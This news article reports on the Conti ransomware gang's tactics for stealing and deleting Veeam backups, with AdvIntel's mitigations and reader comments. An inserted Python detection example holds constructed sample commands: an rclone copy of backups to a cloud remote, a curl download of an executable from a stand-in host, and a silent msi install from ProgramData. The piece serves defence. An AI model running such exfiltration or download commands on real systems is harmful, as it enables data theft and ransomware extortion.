Conti Ransomware Expands Ability to Blow Up Backups

The Conti ransomware gang has developed novel tactics to demolish backups, especially the Veeam recovery software.

Good at identifying and obliterating backups? Speak Russian? The notorious Conti ransomware group may find you a fine hiring prospect.

That’s according to a report published on Wednesday by cyber-risk prevention firm Advanced Intelligence, which details how Conti has honed its backup destruction to a fine art. After all, backups are a major obstacle to encouraging ransomware payment.

A Conti Primer

Palo Alto Networks has described the gang as a standout, and not in a good way: “It’s one of the most ruthless of the dozens of ransomware gangs that we follow,” the firm said.

As of June, Conti had spent more than a year attacking organizations where IT outages can threaten lives: Hospitals, emergency number dispatch carriers, emergency medical services and law-enforcement agencies.


An example: In May, Ireland’s department of health services was still reeling a week after a Conti ransomware attack that wasn’t even all that successful. Officials said at the time that the attack would cost tens of millions of Euros to repair, even though the attackers didn’t even manage to encrypt systems.

Its expertise in demolishing backups has helped Conti – a top-tier Russian-speaking ransomware group that specializes in double extortion – to rain down destruction. According to AdvIntel’s Yelisey Boguslavskiy and Vitali Kremez, Conti bases its negotiation strategies on the premise that the majority of targets who pay the ransom are “motivated primarily by the need to restore their data.”

The two-slap whammy of double extortion entails both data encryption and the threat to publish the seized data. However, according to AdvIntel’s collection of Conti ransomware samples, publishing of data is only a secondary motivator for paying up – most particularly if the victims can rely on backups.

“If the victim has the ability to restore the files via backups, the chances of successful ransom payment to Conti will be minimized, even despite the fact that the risk of data-publishing persists,” the researchers wrote.

Conti’s Backup-Obliteration Methodology

AdvIntel has found that Conti builds its backup-removal expertise from the ground up, starting at the “team development level.” Namely, when the ransomware-as-a-service (RaaS) gang recruits workers to invade networks, it’s clear that penetration-tester candidates need top-notch skills at finding and obliterating backups.

“While selecting network intruders for their divisions also known as ‘teams,’ Conti is particularly clear that experience related to back-up identification, localization and deactivation is among their top priorities for a successful pen-tester,” according to AdvIntel’s analysis. “This backup focus implemented within the partnership-building process enables Conti to assemble teams, equipped with knowledge and skills aimed at backup removal.”

Veeam Vivisection

Conti has focused most particularly on developing new ways to compromise back-up software from disaster-recovery firm Veeam, researchers said.

Conti routinely initiates its attacks by installing the Cobalt Strike beacon: A legitimate, commercially available tool originally designed for network-penetration testers. Its usage by crooks as a backdoor has gone mainstream in the world of crimeware, however.

Conti then leverages another legitimate tool: The remote-management agent Atera. Atera gives the gang persistence in an infected network.

Conti also uses Ngrok, a cross-platform application that exposes local server ports to the internet, to establish a tunnel to the local host for data exfiltration.

In many attacks seen by AdvIntel, this infection routine is followed by Conti operators finding and impersonating a privileged backup user — in order to grant themselves Veeam-backup privileges.

The attackers then typically use a weaponized Rclone – a command line program used to manage files on cloud storage – for data exfiltration of the Veeam backups. Finally, to ensure that the victim has been kneecapped and won’t be able to recover, the Conti attackers lock the victim’s system and manually remove those Veeam backups.

AdvIntel outlined the backup removal steps in the chart below:

Cobalt Strike backup removal sequence. Source: AdvIntel.

“With the Veeam account compromise, Conti has a method to deal with back-up software to ‘force’ ransom payment,” according to the firm’s writeup.

Veeam’s Response

093021 18:58 UPDATE: Rick Vanover, senior director of product strategy for Veeam, provided the following statement to Threatpost:

“There are more options than ever to keep Veeam backup data safe from ransomware. Immutable backup copies on-premises, in the cloud, storage system or unique service provider offerings, or even a combination of these. Veeam has capabilities to drive the highest confidence in data recovery.” —Veeam’s Rick Vanover.

Veeam provides numerous resources on setting up immutable backup and data replication, including this one.

How to Stop Conti’s Backup Destruction

AdvIntel offered these mitigations and recommendations to help fend off Conti backup removal attacks:

    1. To prevent the attack initiations, employee training and email security protocols should be implemented. Conti uses very developed social-engineering techniques in order to convince the victim employees that the targeted emails are legitimate.
    2. Sometimes Conti uses corporate VPN compromise and TrickBot delivery as an alternative means for attack initiation. Tracking externally exposed endpoints is therefore critical.
    3. To prevent lateral movement, network-hierarchy protocols should be implemented with network segregation and decentralization.
    4. Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies, with the focus on any suspicious “curl” command and unauthorized “.msi” installer scripts — particularly those from C:\ProgramData and C:\Temp directory.
    5. Rclone and other data-exfiltration command-line interface activities can be captured through proper logging of process execution with command-line arguments.
    6. Special security protocols, password updates and account-security measures for Veeam should be implemented to prevent Veeam account takeover. Enabled backups tremendously decrease Conti’s ransom demands and can likely lead to data recovery with zero payments to the Conti collective.
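As an illustration of recommendations 4 and 5 (this is an added example, not part of AdvIntel’s report or any vendor tooling), the following Python triages constructed process-creation events in the style of Sysmon Event ID 1, flagging Rclone execution, .msi installers launched from C:\ProgramData or C:\Temp, and curl invocations. The events, user names and paths are all made up for the example.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (Sysmon Event ID 1 style fields),
# not real telemetry: a benign Veeam job, an Rclone copy toward a cloud remote,
# an .msi run from C:\ProgramData, and a curl download into C:\Temp.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Manager.exe",
     "CommandLine": "Veeam.Backup.Manager.exe", "User": "CORP\\svc_veeam"},
    {"Image": r"C:\ProgramData\rclone\rclone.exe",
     "CommandLine": 'rclone.exe copy "D:\\Backups\\Veeam" mega:dump --transfers 32',
     "User": "CORP\\svc_veeam"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /i C:\\ProgramData\\setup.msi /qn", "User": "CORP\\jdoe"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -o C:\\Temp\\a.exe http://example.invalid/a.exe",
     "User": "CORP\\jdoe"},
]

# Staging directories called out in the recommendations above.
SUSPECT_DIRS = (r"c:\programdata", r"c:\temp")


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (empty list if none)."""
    image = event["Image"].lower()
    cmd = event["CommandLine"].lower()
    hits = []
    # Rule A: Rclone binary, or an rclone copy/sync/move whose target is a remote ("name:path").
    if image.endswith(r"\rclone.exe") or re.search(
            r"\brclone(\.exe)?\s+(copy|sync|move)\b.*\s\w+:", cmd):
        hits.append("rclone_exfil")
    # Rule B: msiexec installing a package that lives in a staging directory.
    msi = re.search(r'([a-z]:\\[^\s"]+\.msi)', cmd)
    if "msiexec" in image and msi and msi.group(1).startswith(SUSPECT_DIRS):
        hits.append("msi_from_staging_dir")
    # Rule C: any curl invocation; an allow-list for known jobs belongs here in practice.
    if image.endswith(r"\curl.exe") or re.match(r"^\s*curl(\.exe)?\b", cmd):
        hits.append("curl_usage")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each suspicious event's command line to the rules it triggered."""
    return {e["CommandLine"]: classify(e) for e in events if classify(e)}
```

The rules only work if process auditing records full command lines (Sysmon, or Windows audit policy with command-line logging enabled), which is the point of recommendation 5.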



Discussion

  • Chris Blake on

    Disingenuous apocalyptic click-bait. Hacker gets admin control over any system and you've got problems. Poorly secured environments are always an easy target. This would be true for any backup (or other) vendor, regardless of platform (although the attack vector would be different).
  • anon on

    I disagree. This article outlines specifics in a useful way. Which groups are doing this (Conti), what the new focus is (attacking backups) as they realized backups are a primary thing preventing payouts, and even what hacking tools are used in what way, and what backup software is being targeted (Veeam). I found it very useful.
  • ivan on

    Click bait and free shaming of VEEAM. What is the novel tactic to delete Veeam backups, rm? Seriously? VEEAM deserves some apologies from you.
  • SteveO on

    The Conti kids didn't invent mucking around with backups as part of an overall ransomware attack. All of the "big game hunters" are doing it. This tactic is not a "new focus", nor is it specific to VEEAM or any vendor. One of the reasons that attackers stay in systems/networks so long (200 days, more) is to learn about your backup infrastructure. By the time they're done, they know as much as your backup and recovery SMEs.
  • fabio on

    Fake article. EVERY sysadmin uses VEEAM + NAS for backup; the NAS will be set up with NFS settings, AND Veeam must be hardened as the backup repository, so all ports are closed and it is accessible ONLY from the CONSOLE. And second, usually we have 3 repositories... 1 hardened immutable, so no one can delete backups, 1 NAS locally, 1 NAS remote, 1 CLOUD, 1 HARD DISK offline from the internet!!!! ALL NAS need to have no connection to the internet, same as the VEEAM server.
    • Lisa Vaas on

      Not all Veeam users are taking advantage of immutability. This news is spurring some of those users to act, though, according to Veeam.
  • Robin on

    A lot of Veeam users don't use NAS for sure, probably only the small ones. Bigger organizations use a dedupe target such as Data Domain, using the DDBoost protocol. Then this particular scenario does not apply.
  • Rawad on

    Even if they are using NAS and there was a compromise of the super user credentials, then it can be encrypted. You need to look for a solution that doesn't give access directly to your data regardless of where the request is coming from, and this is called zero trust. There are a few technologies offering access to clones, keeping your data immutable and away from any attack.
  • Anonymous on

    Veeam Immutable repository is a joke... I can use lsattr to remove every single backup set. lol Btw, Veeam Immutable cannot support Oracle RMAN stream backup.
